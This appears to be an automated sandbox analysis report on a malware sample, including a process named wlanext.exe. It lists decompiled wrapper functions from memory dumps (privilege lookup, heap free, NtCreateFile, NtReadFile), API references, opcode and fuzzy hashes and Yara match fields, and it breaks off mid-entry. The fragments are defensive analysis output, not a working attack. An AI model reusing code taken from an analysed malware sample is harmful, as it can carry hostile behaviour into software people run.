Function 00418631, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d0e28a3e249e5261d029a1098db28b1ede62931dcaef012f62527654058d06b2
Instruction ID: 9372bcd8397e7f968798e0e7eca261f10b7c4e800424983a44d494fc143b69bc
Opcode Fuzzy Hash: d0e28a3e249e5261d029a1098db28b1ede62931dcaef012f62527654058d06b2
Instruction Fuzzy Hash: 6F0169B6200208AFCB14DF59DC80DEB77A9EF88354F01865EF90D97241CA34E854CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184ef
0x004184f7
0x0041850d
0x00418511

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418523
0x0041853a
0x00418548

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 81a3c77d0ed1aa6cd6afc841b3520403c88ec921f55e8ceeccbedc7e3a976b86
Instruction ID: c9bfe210ff0605b7622818cbdcea42aeb339d32c6fa1a04ed07fc30905169c36
Opcode Fuzzy Hash: 81a3c77d0ed1aa6cd6afc841b3520403c88ec921f55e8ceeccbedc7e3a976b86
Instruction Fuzzy Hash: 74E0C2706002007BE620CF64CC85FC73BA9AFA8390F108169F90CEB291C635EA008AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AA9694

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00415644, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff0cf4bc27d8a1a53a1f0b90e1cc69965578a0a7e4201fa5c19f76a592b4c1c1
Instruction ID: 2b07601ab3059db42c68d0b0f6f5ef2d61ce51654e80e8c5e0d9b653ee6e451c
Opcode Fuzzy Hash: ff0cf4bc27d8a1a53a1f0b90e1cc69965578a0a7e4201fa5c19f76a592b4c1c1
Instruction Fuzzy Hash: 27019936010A54DBCB26CF28E4C20E1BFF0EF0B30079011D7C898CF019DA26D462CAEA

Uniqueness

Uniqueness Score: -1.00%

Function 004162B0, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b2601118530ac30386c3b147bcad0c6f151ca8dfc7f9e8feebdd202550153
Instruction ID: 556bfbcb70680d0b2c3654e0643aeb1ac07cfe0c520712098d020881a542871e
Opcode Fuzzy Hash: 4f4b2601118530ac30386c3b147bcad0c6f151ca8dfc7f9e8feebdd202550153
Instruction Fuzzy Hash: E1E07D33A0501286C304DC28FC904F4F3A1AF8224A784A26EE448B3109CB21940053CC

Uniqueness

Uniqueness Score: -1.00%

Function 00AA98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
Instruction ID: 80e7c74b88f51f5b80398f446ee9277c9114b3a0ad81874ba7596e57ede1daa3
Opcode Fuzzy Hash: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
Instruction Fuzzy Hash: 3690026130100403D24261694414646040DD7D2385F91C032E1414555ED6659953F172

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
Instruction ID: f719995656ee623fe352466aea71d6d429b4a295b24b0a4bbf22f93bc17f59a5
Opcode Fuzzy Hash: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
Instruction Fuzzy Hash: B690027124100403D28171694404646040DE7D1381F91C032A0414554FD6959A56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
Instruction ID: ea4102b01792301a5e92dc3d108d4c7b813b652b012769d5aa7e9908f8e3d3c0
Opcode Fuzzy Hash: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
Instruction Fuzzy Hash: E69002A1601140434680B16948044465419E7E2341791C131A0444560DD6A89855E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AA95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
Instruction ID: 9d74921b52bca0e5f4827e61ae14116197f4e33ba98693b6aaf6dfc56a16dac2
Opcode Fuzzy Hash: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
Instruction Fuzzy Hash: 3390027120100803D244616948046C60409D7D1341F51C031A6014655FE6A59891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00AA99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
Instruction ID: d642fb31bcf3141b8e6508ba1b20ec6347d49ddaa7ff503e7b7ee80854962304
Opcode Fuzzy Hash: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
Instruction Fuzzy Hash: 249002A121100043D244616944047460449D7E2341F51C032A2144554DD5699C61A165

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
Instruction ID: 7d9662ad6e8a3fed1e88dd751ce4400a17061ec5250e468d676ad3c083087444
Opcode Fuzzy Hash: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
Instruction Fuzzy Hash: 889002E1201140934640A2698404B4A4909D7E1341F51C036E1044560DD5659851E175

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
Instruction ID: 34e9d23b28d07dda06aa8d4f62a22997667d2d4d74561f2e18c7cb25afe26bca
Opcode Fuzzy Hash: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
Instruction Fuzzy Hash: CE900271A0500013928071694814686440AE7E1781F55C031A0504554DD9949A55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
Instruction ID: 3e5ee99703103bf0c494ce5b740914bb704dc17833dd4cc4dfcae72819f0a1b8
Opcode Fuzzy Hash: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
Instruction Fuzzy Hash: BD900265221000030285A569060454B0849E7D7391791C035F1406590DD6619865A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
Instruction ID: e9433365228d043fac525cc9de086db07c8b76303feca9347528c0b528c59f52
Opcode Fuzzy Hash: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
Instruction Fuzzy Hash: 939002A120140403D280656948046470409D7D1342F51C031A2054555FDA699C51B175

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
Instruction ID: 936949fc0e195b3af87fcc8b50261bb1b15fd386ce1bef0e7766b1d19d1683af
Opcode Fuzzy Hash: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
Instruction Fuzzy Hash: A990026120144443D28062694804B4F4509D7E2342F91C039A4146554DD9559855A761

Uniqueness

Uniqueness Score: -1.00%

Function 00AA96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
Instruction ID: 53d2bf8f1b0d460efcd76ed25c909f7e08799cc461d3d10a605fa2e80575f851
Opcode Fuzzy Hash: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
Instruction Fuzzy Hash: 4490027120100843D24061694404B860409D7E1341F51C036A0114654ED655D851B561

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
Instruction ID: 7fed28f27017d91fe909a0e699115d7c32b0c8d7970a2ed767ae396e20846922
Opcode Fuzzy Hash: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
Instruction Fuzzy Hash: 5390027120140403D240616948087870409D7D1342F51C031A5154555FD6A5D891B571

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
Instruction ID: a9ede3f7c53e25d79cfd4b8e9e7ab47ef1a10a3254a9be50b3da8e2cb2080f6c
Opcode Fuzzy Hash: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
Instruction Fuzzy Hash: 5E90027160500803D290716944147860409D7D1341F51C031A0014654ED7959A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
Instruction ID: c084f8f012757f0d8577e2c57e4afae6fd6f9ea66af732f8ed40cab02e9168f7
Opcode Fuzzy Hash: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
Instruction Fuzzy Hash: 4790027120504843D28071694404A860419D7D1345F51C031A0054694EE6659D55F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
Instruction ID: b5d0f9ce3fb4aada2f14b424a84e755e03a42f629bab66f3d7a7c4552aa4476f
Opcode Fuzzy Hash: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
Instruction Fuzzy Hash: 6190027120144003D2807169844464B5409E7E1341F51C431E0415554DD6559856E261

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
Instruction ID: 02f0165ac3a81477885a747cb44e45e695ecb3afb0d27b0a62c6ce26b9f2ab04
Opcode Fuzzy Hash: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
Instruction Fuzzy Hash: EF90026160500403D280716954187460419D7D1341F51D031A0014554ED6999A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
Instruction ID: 776c23441be3428e992387b3eba48c1286d5062ad414485a7b5721b9e89eb18f
Opcode Fuzzy Hash: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
Instruction Fuzzy Hash: 2490026124100803D28071698414747040AD7D1741F51C031A0014554ED6569965B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
Instruction ID: d28de0b2940ae967444aac691aa3b382a3b9abd4964a1e1fd030553d0fadbc3c
Opcode Fuzzy Hash: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
Instruction Fuzzy Hash: 6C900271301000539640A6A95804A8A4509D7F1341F51D035A4004554DD5949861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
Instruction ID: f0913206a4ae92bd550c2b46d54513cd428747659343a1f707c27b14d2a72613
Opcode Fuzzy Hash: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
Instruction Fuzzy Hash: 6690027120100403D240616955087470409D7D1341F51D431A0414558EE6969851B161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
Instruction ID: 89f98db0f3eb6d282948df418d73f6c62b2f969274da9508d1c86c7113ec9258
Opcode Fuzzy Hash: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
Instruction Fuzzy Hash: 5990026120504443D24065695408A460409D7D1345F51D031A1054595ED6759851F171

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
Instruction ID: 1407dcf5a6e870b0e1fffdcd91625bba82f79131df090ed1ac233d2e2e9f6331
Opcode Fuzzy Hash: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
Instruction Fuzzy Hash: CE90027520504443D64065695804AC70409D7D1345F51D431A041459CED6949861F161

Uniqueness

Uniqueness Score: -1.00%

Function 00AA9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 5af8322f4f95ad0ade0990ce6918233cddeed9e1a90a3dff63dd899b2780db26
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00affdda
0x00affde2
0x00affde5
0x00affdec
0x00affdfa
0x00affdff
0x00affe0a
0x00affe0f
0x00affe17
0x00affe1e
0x00affe19
0x00affe19
0x00affe19
0x00affe20
0x00affe21
0x00affe22
0x00affe25
0x00affe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B

Memory Dump Source

Source File: 00000003.00000002.735980279.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 4832 Parent PID: 3424 wlanext.exeCOMMON

Executed Functions

Function 008681CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00863BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00863BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0086821D

Strings

.z`, xrefs: 0086820D, 00868218

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 03106105d5ebec2104de587694113df6b39177665eb7774b11bf7235239e95f3
Instruction ID: d8e5a0395616bdf7ad67523183fedc4e6287cddc9f07276cba0d534c5a5e3430
Opcode Fuzzy Hash: 03106105d5ebec2104de587694113df6b39177665eb7774b11bf7235239e95f3
Instruction Fuzzy Hash: BB01B6B2200108ABCB08DF98DC95EEB37ADAF8C754F158248BA1DA7251C630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 008681D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00863BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00863BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0086821D

Strings

.z`, xrefs: 0086820D, 00868218

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 1b997ed559996a42c1c464b24105628b96a93dd96f7e9411b6898a0e1290e250
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: C2F0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0086827A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00863D62,5E972F59,FFFFFFFF,00863A21,?,?,00863D62,?,00863A21,FFFFFFFF,5E972F59,00863D62,?,00000000), ref: 008682C5

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3a4889e0e824681071c576ecab6851faa39513b1560ca95728cbe8dca07dc4a3
Instruction ID: 7dd2d8e2ed2692380637a3ad07beed0bd8f9d168e45084ed16da49f5fd387b47
Opcode Fuzzy Hash: 3a4889e0e824681071c576ecab6851faa39513b1560ca95728cbe8dca07dc4a3
Instruction Fuzzy Hash: A7F0E7B2210108AFCB04DF88DC80EEB77EDEF8C754F018249BA0D97241DA30EC118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00868280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00863D62,5E972F59,FFFFFFFF,00863A21,?,?,00863D62,?,00863A21,FFFFFFFF,5E972F59,00863D62,?,00000000), ref: 008682C5

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
